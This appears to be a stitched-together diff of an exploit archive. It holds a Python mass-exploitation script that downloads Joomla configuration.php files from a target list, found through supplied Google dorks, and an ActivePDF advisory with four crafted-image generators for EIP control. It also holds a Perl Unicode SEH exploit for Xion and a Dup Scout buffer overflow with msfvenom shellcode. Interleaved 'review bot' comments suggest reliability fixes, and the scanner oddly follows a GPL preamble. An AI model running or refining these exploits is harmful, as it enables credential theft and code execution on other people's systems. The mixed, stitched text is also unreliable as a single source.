Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.

Preamble

The GNU General Public License is a free, copyleft license for
software and other kinds of works.

The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.

When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.

To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.

For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.

Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.

For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.

Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.

Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.

The precise terms and conditions for copying, distribution and
modification follow.
'''
try:
import urllib2
except:
print "$ pip2 install urllib2"
try:
import argparse
except:
print "$ pip2 install argparse"
try:
import BeautifulSoup
except:
print "$ pip2 install BeautifulSoup"
try:
import urlparse
except:
print "$ pip2 install urlparse"
try:
import requests
except:
print "$ pip2 install requests"
try:
import threading
except:
print "$ pip2 install threading"
import time, sys , os
global Animation, slowprint, fastprint
os.system('clear')

class Lab_Collors():
vermelho = '\033[31m'
verde = '\033[32m'
azul = '\033[34m'
ciano = '\033[36m'
purple = '\033[35m'
amarelo = '\033[33m'
preto = '\033[30m'
branco = '\033[37m'
original = '\033[0;0m'
reverso = '\033[2m'
default = '\033[0m'

def slowprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush() # defeat buffering
time.sleep(8./90)
#time.sleep(10./90)

def fastprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush() # defeat buffering
time.sleep(1./50)

def Animation(String, color):
animation = "|/-\\"
for i in range(15):
time.sleep(0.1)
sys.stdout.write("\r" + "[" + animation[i % len(animation)] + "]" + color + String)
sys.stdout.flush()
print('')

print ''
parser = argparse.ArgumentParser(description='JOOMANAGER_Arbitrary_File_Download')
parser.add_argument('-t','--targets', action='store',help='--targets Targets.txt')
args = parser.parse_args()



class Lab_Banners():
Bulls = '''
╭━━━┳╮╱╱╱╱╱╱╱╭╮
┃╭━╮┃┃╱╱╱╱╱╱╭╯╰╮
┃╰━╯┃╰━┳━━┳━╋╮╭╋━━┳━━┳╮╭╮
┃╭━━┫╭╮┃╭╮┃╭╮┫┃┃╭╮┃━━┫╰╯┃
┃┃╱╱┃┃┃┃╭╮┃┃┃┃╰┫╭╮┣━━┃┃┃┃
╰╯╱╱╰╯╰┻╯╰┻╯╰┻━┻╯╰┻━━┻┻┻╯
, . ╭╮╱╱╱╱╱╭╮
/| |\ ┃┃╱╱╱╱╱┃┃
|-| łαbørαŧøriø Ŧαηŧαsмα |-| ┃┃╱╱╭━━┫╰━╮
[ "-.____ ____.-" ] ┃┃╱╭┫╭╮┃╭╮┃
\_ / \ ___.___ / \ _/ ┃╰━╯┃╭╮┃╰╯┃
"-__[ ===!=== ]__-" ╰━━━┻╯╰┻━━╯
| | +==========================================================+
.-"" _|=__ | __=|_ ""-, | COM_JOOMANAGER ARBITRARY FILE DOWNLOAD |
`""" \ "`==´ `==´" / """´ +==========================================================+
\ \\ // / | [*] GoogleDork: allinurl:index.php?option=com_joomanager |
\ |\___/| / | [*] GoogleDork: allinurl:/component/joomanager/ |
\,;-----;./ | [*] Coded: Luth1er [*] Date: 30 - 06 - 2017 |
| @@ @@ | | [*] GitHub: https://github.com/Luth1er |
\ -"""- / | - I take no responsibilities for the |
`-----´ | - use of this program ! |
+==========================================================+'''
if not args.targets:
os.system('clear')
print Lab_Collors.azul+Lab_Banners.Bulls
print ''
print Lab_Collors.ciano+"[*] Usage: "
print Lab_Collors.branco+"Joomanager_Afd.py --target Targets.txt"
print Lab_Collors.branco+"Joomanager_Afd.py -t Targets.txt"
print ''
exit()

print Lab_Collors.azul+Lab_Banners.Bulls
slowprint(Lab_Collors.ciano+" Telegram: "+Lab_Collors.purple+"@DreadPirateRobertt")
fastprint(Lab_Collors.ciano+" Telegram: "+Lab_Collors.azul+"t.me/Phantasm_Lab")


class COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD(threading.Thread):
global Animation, fastprint
def __init__(self, targets):
threading.Thread.__init__(self)
targets = open(targets, 'r').readlines()
self.targets = targets
self.process = None
def run(self):
try:
count = 0
print ''
Animation("COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD", Lab_Collors.verde)
print ''
for target in self.targets:
try:
target = target.strip()
exploit3r = "index.php?option=com_joomanager&controller=details&task=download&path=configuration.php"
exploit_dir = str(target+exploit3r)
try:
path = urlparse.urlparse(target).path
url_title = target.replace(path, "")
title = requests.get(url_title)
except:
title = requests.get(target)
exploit = urllib2.urlopen(exploit_dir)

soup = BeautifulSoup.BeautifulSoup(title.content.decode('utf-8','ignore'))
Scraping_title = str(soup.title.text)
with open(soup.title.text+".php","wb") as Attatchment:
Attatchment.write(exploit.read())
print ''
print Lab_Collors.verde+"+==========================+"
print Lab_Collors.verde+"| Exploit Information: |"
print Lab_Collors.verde+"+================================================================================"
print Lab_Collors.purple+"[+] Target: {}".format(Lab_Collors.amarelo+url_title)
print Lab_Collors.purple+"[+] Title: {}".format(Lab_Collors.azul+Scraping_title)
fastprint(Lab_Collors.purple+"[+] Exploited: ========================================================> 100%")
print Lab_Collors.purple+"[+] Server: {}".format(str(Lab_Collors.amarelo+title.headers['server']))
try:
print Lab_Collors.purple+"[+] Connection: {}".format(Lab_Collors.branco+str(title.headers['Connection']))
except:
pass
print Lab_Collors.purple+"[+] Exploit: {}".format(Lab_Collors.vermelho+exploit3r)
print Lab_Collors.purple+"[+] Path: "+Lab_Collors.ciano+"/COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD/Title.php"
print Lab_Collors.verde+"+================================================================================"
print ''
count = count + 1
except KeyboardInterrupt:
print("Exiting")
sys.exit(1)
except Exception as Error:
print "Error as {}".format(Error)
pass
Animation("Logout....", Lab_Collors.vermelho)
print Lab_Collors.branco+"[!] Total Exploited: %s" % str(count)
print ''
sys.exit(1)
except KeyboardInterrupt:
print "Exiting...."
sys.exit(1)

def main():
try:
threads = 1
for host in range(int(threads)):
Init_Atck = COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD(args.targets)
Init_Atck.daemon=True
Init_Atck.start()
while True: time.sleep(100)
except (KeyboardInterrupt, SystemExit):
print''
Animation(" Exit Threading....", Lab_Collors.vermelho)


if __name__ == '__main__':
try:
main()
except Exception as e:
print "[!] Error as %s" % e
exit()
except KeyboardInterrupt:
fastprint(Lab_Collors.vermelho+"[!] Keyboard as Interrupt....")
exit()
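Review bot: in `run()` the local output filename is taken from the scanned site's own HTML title (`with open(soup.title.text+".php","wb") as Attatchment:`), so a target controls where the downloaded configuration.php is written, including path separators and `..` components; derive the name from the host instead (e.g. `urlparse.urlparse(target).netloc`) or sanitise the title before using it as a path. Also `url_title` is only assigned inside the inner `try:`, so when that branch falls into its `except:` the later `"[+] Target: {}".format(Lab_Collors.amarelo+url_title)` raises NameError and a successful download is reported as an error; and the `except:` branches around the imports print `pip2 install` hints for `urllib2`, `argparse`, `urlparse` and `threading`, which are part of the Python 2 standard library and cannot be installed from pip.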
201
exploits/windows/dos/44251.txt
Normal file
@ -0,0 +1,201 @@
ActivePDF Toolkit < 8.1.0 multiple RCE

Introduction
============
The ActivePDF Toolkit is a Windows library which enhances business
processes to stamp, stitch, merge, form-fill, add digital signatures,
barcodes to PDF. Both .NET and native APIs are provided. Amongst many
other operations, this library can be used by applications to transform
images to PDF files.

Multiple vulnerabilities were identified in the Pictview image processing
library embedded by the Toolkit and signed by ActivePDF. They could allow
remote attackers to compromise applications relying on the Toolkit to
process untrusted images. Note that, while the example instances hereafter
use “exotic” file types, the parser determines the image type from magic
bytes, ignoring file extensions in most cases.

CVE
===
CVE-2018-7264

Affected versions
=================
ActivePDF Toolkit before 8.1.0 (build 8.1.0.19023)

Author
======
François Goichon - Google Security Team

CVE-2018-7264
=============
ActivePDF Toolkit < 8.1.0.19023 multiple RCE

Summary
-------
An image processing library embedded in the ActivePDF Toolkit product is
prone to multiple BSS out-of-bound and signedess errors which can yield
direct EIP control by overwriting function pointers, error handling
structures or IAT entries. Note that the affected library does not enable
ASLR.

Reproduction
------------
The following scripts can be used to generate crafted image files which
achieve EIP control when parsed or converted by the ActivePDF Toolkit (e.g.
via the ImageToPDF method), through different root causes. These examples
can be reproduced through both the .NET and native APIs and independently
from file extensions, however the .NET layer will hide the native crashes
and return -1. This may crash the library with a lock on, so only use in
test environments.

* Interchange File Format (.iff) and derivates
---
#!/usr/bin/env python2
#
# eax=28147510 ebx=00009c1c ecx=28147510 edx=00009c1c esi=28140e90
edi=02930a6c
# eip=41414141 esp=0061f264 ebp=0061f26c iopl=0 nv up ei pl nz na
po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010202
# 41414141 ?? ???

from struct import pack

header = "FORMXOXOILBM"

bodycontents = "AAA"
body = "BODY" + pack(">I", len(bodycontents)) + bodycontents
while (len(body) % 2) == 1:
body += "\x00"

base = 0x28147510
payload = pack("<I", base).ljust(0x28151114 - base, "A") + pack("<I", base)
cmap = "CMAP" + pack(">I", len(payload)) + payload
while (len(cmap) % 2) == 1:
cmap += "\x00"

outp = header + cmap + body
assert len(outp) >= 0x28

with open("test.iff", "wb") as f:
f.write(outp)
---

* Zoner Draw images (.zmf, .zbr)
---
#!/usr/bin/env python2
#
# eax=28151110 ebx=0000002e ecx=0000bc28 edx=2813eb10 esi=00000008
edi=028e0a6c
# eip=41414141 esp=2814550c ebp=41414141 iopl=0 nv up ei ng nz ac
pe cy
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010297
# 41414141 ?? ???

from struct import pack

header = pack("<III", 0x5c, 0xD4015ADD, 0x12345678)
header = header.ljust(9*4) + pack("<I", 0x3c)
header = header.ljust(0x3c)

base = 0x2814550C
payload = '\x00' * (0x28151124 - base) + pack("<I", base) + "A"*8

# can be triggered by multiple formats
header2 = pack("<H", 0x4d42)
header2 = header2.ljust(14) + pack("<I", 50-14)
header2 = header2.ljust(28) + pack("<HI", 0, 0)
header2 = header2.ljust(46) + pack("<I", len(payload)/4 + 1)

outp = header + header2 + payload

with open("test.zmf", "w") as f:
f.write(outp)
---

* Sun Raster images (.ras)
---
#!/usr/bin/python2
#
#WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding
can be inaccurate.
#eax=28151110 ebx=0000000c ecx=0000fc2d edx=2813eb10 esi=00000008
edi=02880a6c
#eip=41414141 esp=28141504 ebp=41414141 iopl=0 nv up ei ng nz ac pe
cy
#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010297
#41414141 ?? ???

from struct import pack

header = pack(">IIIIIII", 0x59A66A95, 0x100, 1, 8, 0, 2, 1)

base = 0x28141504
payload = "".ljust(0x28151124 - base, "\x00") + pack("<I", base) + "A"*8
outp = header + pack(">I", len(payload)+1) + payload

with open("test.ras", "wb") as f:
f.write(outp)
---

* Truevision Targa images (.bpx)
---
#!/usr/bin/env python2
#
#eax=28151110 ebx=00000004 ecx=00000008 edx=2813eb10 esi=00000008
edi=028f0a6c
#eip=41414141 esp=0061f2a0 ebp=0061f2e8 iopl=0 nv up ei ng nz ac pe
cy
#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010297
#41414141 ?? ???

from struct import pack

target = 0x2815112C
payload = "AAAA"

# TGA / PIC / BPX
base = { 3: 0x28147510, 4: 0x2814550c }
align = None
for al in [3, 4]:
if ((target - base[al]) % al) == 0:
align = al
break
assert align

header = "\x00\x01\x00"
header += pack("<H", (target - base[align])/align)
header += pack("<H", (len(payload)/align)+1)
header += chr(32 if align == 4 else 24)
header = header.ljust(16)
header += chr(1)
header = header.ljust(18)

with open("test.bpx", "wb") as f:
f.write(header + payload)
---

Remediation
-----------
Upgrade to ActivePDF Toolkit >= 8.1.0 (build 8.1.0.19023), which fixes the
problem by removing the affected image processing library. Note that this
also fixes the similar ZDI-16-354 vulnerability.

For more information and guidance, please contact the ActivePDF support
through their portal (https://support.activepdf.com).


Disclosure timeline
===================
2017/11/28 - Report sent to ActivePDF support
2017/11/28 - Support acknowledges the issue and confirms that the library
is scheduled to be removed from the product
2018/01/29 - Received notification from the ActivePDF support that the
Pictview image processing library had been removed from ActivePDF in build
8.1.0.19023
2017/02/26 - Public disclosure
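Review bot: the Zoner Draw generator opens its output in text mode (`with open("test.zmf", "w") as f:`) while the other three scripts use `"wb"`; on Windows, where the Toolkit runs, any 0x0a byte in `header`, `header2` or `payload` is written as 0x0d 0x0a and shifts the offsets the script computes from `base`, so it should be `"wb"` like the others. Also the last timeline entry reads `2017/02/26 - Public disclosure`, which predates the initial report on 2017/11/28; given the 2018/01/29 entry above it this is presumably 2018/02/26.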
177
exploits/windows/local/44243.pl
Executable file
@ -0,0 +1,177 @@
#!/usr/bin/perl
# ########################################################################
# Title: Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit
# Vulnerability Type: Execute Code, Overflow UTF-16LE buffer, Memory corruption
# Date: Feb 18, 2018
# Author: James Anderson (synthetic)
# Original Advisory: http://www.exploit-db.com/exploits/14517 (hadji samir) Published: 2010-07-31
# Exploit mitigation: There is no /SAFESEH, SEHOP, /GS, DEP, ASLR
# About: The technique is taken from that paper: Creating Arbitrary Shellcode In Unicode Expanded Strings Chris Anley
# Tested on: Win NT 5.1.2600 EN: Windows XP SP3 Eng Pro, Intel x86-32
# ########################################################################
# _ _ _ _
# ___ _ _ _ __ | |_| |__ ___| |_(_) ___
# / __| | | | '_ \| __| '_ \ / _ \ __| |/ __|
# \__ \ |_| | | | | |_| | | | __/ |_| | (__
# |___/\__, |_| |_|\__|_| |_|\___|\__|_|\___|
# |___/
#
# ########################################################################

my $path = "/media/s4/DragonR.m3u";

my $buffer_length = 5000;
my $suboffset = 0x104;
my $NOP1 = "\x6F"; # add [edi], ch
my $NOP2 = $NOP1."\x59"; # add [edi], ch # pop ecx

# [0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Offset to SEH frame
my $crash = "A" x 260;
# [1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Set SEH frame
$crash .= "\x61".$NOP1; # popad # NOP-eq; nSEH; popad puts an address close to the buffer in EAX
$crash .= "\x79\x41"; # pop r32 pop r32 ret; SEh. address for no /SAFESEH / SEHOP, DEP, ASLR

my $offset_to_payload = length($crash);

# [2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ settingcode.
# [2.0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ set ecx=2 and eax -> [shellcode]
$crash .= $NOP1; # NOP-eq
$crash .= "\x6a\x59"; # push 0 # pop ecx
$crash .= $NOP1; # NOP-eq
$crash .= "\x41"; # inc ecx
$crash .= "\xCC"; # add ah, cl # eax = eax + 0x100
$crash .= $NOP1; # NOP-eq
$crash .= "\x41"; # inc ecx
$crash .= "\xC8"; # add al, cl
$crash .= "\xC8"; # add al, cl # eax = eax+2+2;# and as a result: eax = eax + $suboffset(0x104) # EAX -> SC;

# [2.1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ we're correcting the first BAD character
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x3b\x41"; # mov edx, 41003b00
$crash .= "\x30"; # add [eax],dh
$crash .= $NOP1; # NOP-eq

# [2.2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the second byte and the first 00
$crash .= "\x40"; # inc eax
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xec\x41"; # mov edx, 4100ec00
$crash .= "\x30"; # add [eax],dh

# [2.3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the fourth byte 00. BAD char
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x45\x41"; # mov edx, 41004500
$crash .= "\x30"; # add [eax],dh
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x46\x41"; # mov edx, 41004600
$crash .= "\x30"; # add [eax],dh

# [2.4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x68\x41"; # mov edx, 41006800
$crash .= "\x30"; # add [eax],dh

# [2.5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x78\x41"; # mov edx, 41007800
$crash .= "\x30"; # add [eax],dh

# [2.6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x2F\x41"; # mov edx, 41002F00
$crash .= "\x30"; # add [eax],dh

# [2.7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x63\x41"; # mov edx, 41006300
$crash .= "\x30"; # add [eax],dh

# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x64\x41"; # mov edx, 41006400
$crash .= "\x30"; # add [eax],dh

# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x8d\x41"; # mov edx, 41008d00
$crash .= "\x30"; # add [eax],dh

# [2.9] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xf8\x41"; # mov edx, 4100f800
$crash .= "\x30"; # add [eax],dh

# [2.10] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xb8\x41"; # mov edx, 4100b800
$crash .= "\x30"; # add [eax],dh

# [2.11] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x49\x41"; # mov edx, 41004900
$crash .= "\x30"; # add [eax],dh
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x4A\x41"; # mov edx, 41004A00
$crash .= "\x30"; # add [eax],dh

# [2.12] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x77\x41"; # mov edx, 41007700
$crash .= "\x30"; # add [eax],dh

# [2.13] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xd0\x41"; # mov edx, 4100d000
$crash .= "\x30"; # add [eax],dh

# [3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -4: one more NOP below # -8: sizeof(SEHframe)
# *2: for UTF-16 # /4: 2 for UTF-16 and 2 for the 2-byte-NOP
$crash .= $NOP2 x (($suboffset - 4 - 8 - (length($crash)*2 - $offset_to_payload*2))/4); # NOP-eq + pop ecx
$crash .= $NOP1."\x6A"; # NOP1 + NOP1-eq (push 0)


# [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode. left - ^jalousie; right - actual shellcode that will be crafted. CMD=cmd.exe
my $shellcode =
"\x50". # "\x8b". # # BAD BYTE
# "\xec". # 0
"\x55". # "\x55".
# "\x8b". # 0 # BAD BYTE
"\xec". # "\xec".
# "\x68". # 0
"\x65". # "\x65".
# "\x78". # 0
"\x65". # "\x65".
# "\x2F". # 0
"\x68". # "\x68".
# "\x63". # 0
"\x6d". # "\x6d".
# "\x64". # 0
"\x2e". # "\x2e".
# "\x8d". # 0
"\x45". # "\x45".
# "\xf8". # 0
"\x50". # "\x50".
# "\xb8". # 0
"\xc7". # "\xc7".
# "\x93". # 0 # BAD BYTE
"\xc2". # "\xc2".
# "\x77". # 0
"\xff"; # "\xff".
# "\xd0"; # 0

$crash .= $shellcode;

$crash .= "C" x ($buffer_length - length($crash));
open(myfile, ">$path");
print myfile $crash;
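Review bot: the file write at the end (`open(myfile, ">$path");` followed by `print myfile $crash;`) neither checks the return value of `open` nor closes the handle, and `$path` is hard-coded to `/media/s4/DragonR.m3u`, so on any other machine the script silently produces nothing; use the three-argument form with an error check (`open(my $fh, '>', $path) or die "$path: $!";`), `binmode($fh)` since `$crash` is raw bytes, and `close($fh)`. Also the stage markers in the decoder section read `# [2.8]` twice in a row (before `mov edx, 41006400` and again before `mov edx, 41008d00`), so the numbering from `[2.9]` onwards no longer matches the count of patched bytes.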
70
exploits/windows/local/44244.py
Executable file
@ -0,0 +1,70 @@
#!/usr/bin/python
|
||||
|
||||
#
|
||||
# Exploit Author: bzyo
|
||||
# Twitter: @bzyo_
|
||||
# Exploit Title: Dup Scout Enterprise 10.5.12 - Local Buffer Overflow
|
||||
# Date: 02-22-2018
|
||||
# Vulnerable Software: Dup Scout Enterprise v10.5.12
|
||||
# Vendor Homepage: http://www.dupscout.com
|
||||
# Version: 10.5.12
|
||||
# Software Link: http://www.dupscout.com/downloads.html
|
||||
# Tested On: Windows 7 x86
|
||||
#
|
||||
# bad chars \x00\x0a and everything above \x80
|
||||
#
|
||||
# PoC:
|
||||
# 1. generate dupscout.txt, copy contents to clipboard
|
||||
# 2. open app, select Server, select Connect
|
||||
# 3. type anything into Share Name, paste dupscout.txt contents into User Name
|
||||
# 4. select Connect and then OK
|
||||
# 5. pop calc
|
||||
#
|
||||
|
||||
filename="dupscout.txt"
|
||||
|
||||
junk = "A"*792
|
||||
|
||||
#0x10021144 : push esp # ret | ascii {PAGE_EXECUTE_READ} [libspg.dll]
|
||||
eip = "\x44\x11\x02\x10"
|
||||
|
||||
fill = "\x43"*560
|
||||
|
||||
#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f c
|
||||
#Payload size: 440 bytes
|
||||
calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
|
||||
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
|
||||
"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6b\x32\x53\x30"
|
||||
"\x57\x70\x67\x70\x53\x50\x4e\x69\x39\x75\x54\x71\x39\x50\x61"
|
||||
"\x74\x6c\x4b\x66\x30\x44\x70\x6c\x4b\x73\x62\x46\x6c\x6e\x6b"
|
||||
"\x66\x32\x66\x74\x4e\x6b\x62\x52\x65\x78\x44\x4f\x78\x37\x72"
|
||||
"\x6a\x46\x46\x44\x71\x6b\x4f\x4c\x6c\x57\x4c\x53\x51\x51\x6c"
|
||||
"\x47\x72\x34\x6c\x47\x50\x69\x51\x6a\x6f\x64\x4d\x37\x71\x59"
|
||||
"\x57\x6d\x32\x5a\x52\x51\x42\x61\x47\x4e\x6b\x36\x32\x44\x50"
|
||||
"\x6c\x4b\x73\x7a\x55\x6c\x4c\x4b\x42\x6c\x52\x31\x63\x48\x6d"
|
||||
"\x33\x32\x68\x43\x31\x5a\x71\x53\x61\x6c\x4b\x36\x39\x31\x30"
|
||||
"\x73\x31\x4e\x33\x4c\x4b\x50\x49\x65\x48\x39\x73\x46\x5a\x37"
|
||||
"\x39\x4e\x6b\x64\x74\x4e\x6b\x63\x31\x78\x56\x35\x61\x6b\x4f"
|
||||
"\x6e\x4c\x39\x51\x7a\x6f\x46\x6d\x63\x31\x4b\x77\x50\x38\x6d"
|
||||
"\x30\x32\x55\x79\x66\x35\x53\x71\x6d\x78\x78\x57\x4b\x61\x6d"
|
||||
"\x35\x74\x70\x75\x69\x74\x30\x58\x4c\x4b\x30\x58\x31\x34\x75"
|
||||
"\x51\x69\x43\x70\x66\x4c\x4b\x44\x4c\x50\x4b\x6c\x4b\x42\x78"
|
||||
"\x75\x4c\x76\x61\x4e\x33\x4e\x6b\x57\x74\x4e\x6b\x55\x51\x6a"
|
||||
"\x70\x4d\x59\x67\x34\x67\x54\x77\x54\x63\x6b\x53\x6b\x33\x51"
|
||||
"\x42\x79\x73\x6a\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x42"
|
||||
"\x7a\x6e\x6b\x34\x52\x58\x6b\x6e\x6d\x61\x4d\x62\x4a\x35\x51"
|
||||
"\x4c\x4d\x4f\x75\x4f\x42\x73\x30\x33\x30\x63\x30\x46\x30\x42"
|
||||
"\x48\x45\x61\x6e\x6b\x52\x4f\x4d\x57\x6b\x4f\x4a\x75\x4d\x6b"
|
||||
"\x4c\x30\x58\x35\x39\x32\x51\x46\x51\x78\x49\x36\x4a\x35\x6f"
|
||||
"\x4d\x4d\x4d\x59\x6f\x4a\x75\x55\x6c\x54\x46\x31\x6c\x65\x5a"
|
||||
"\x6d\x50\x59\x6b\x49\x70\x31\x65\x37\x75\x4f\x4b\x73\x77\x62"
|
||||
"\x33\x62\x52\x52\x4f\x53\x5a\x73\x30\x76\x33\x79\x6f\x68\x55"
|
||||
"\x62\x43\x70\x61\x42\x4c\x35\x33\x76\x4e\x53\x55\x30\x78\x43"
|
||||
"\x55\x43\x30\x41\x41")
|
||||
|
||||
buffer = junk + eip + calc + fill
|
||||
|
||||
textfile = open(filename , 'w')
|
||||
textfile.write(buffer)
|
||||
textfile.close()
|
|
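Review bot: the header comment declares `\x00\x0a` and everything above `\x80` as bad characters, but nothing in the script enforces that, and `open(filename , 'w')` writes the buffer in text mode; the alpha_mixed payload happens to be pure ASCII so it survives today, but any payload change could be silently re-encoded or newline-translated. Suggest `open(filename, 'wb')` with `bytes` literals (which also lets the script run unchanged under Python 3 despite the `#!/usr/bin/python` shebang), and rename `buffer`, which shadows a Python 2 builtin.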
@ -5888,6 +5888,8 @@ id,file,description,date,author,type,platform,port
|
|||
44235,exploits/macos/dos/44235.c,"Apple macOS Sierra 10.12.1 - 'IOFireWireFamily' FireWire Port Denial of Service",2017-08-19,"Brandon Azad",dos,macos,
|
||||
44238,exploits/osx/dos/44238.c,"Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic",2017-01-10,"Brandon Azad",dos,osx,
|
||||
44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
|
||||
44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple,
|
||||
44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
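Review bot: the new 44247 row files the Suricata detection bypass under type `dos`, the column users filter on, although its title describes an evasion rather than a crash; either follow the repository's convention for bypass entries consistently or make the description say which behaviour the file demonstrates, so the entry is found by the people looking for it.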
@ -9566,6 +9568,9 @@ id,file,description,date,author,type,platform,port
|
|||
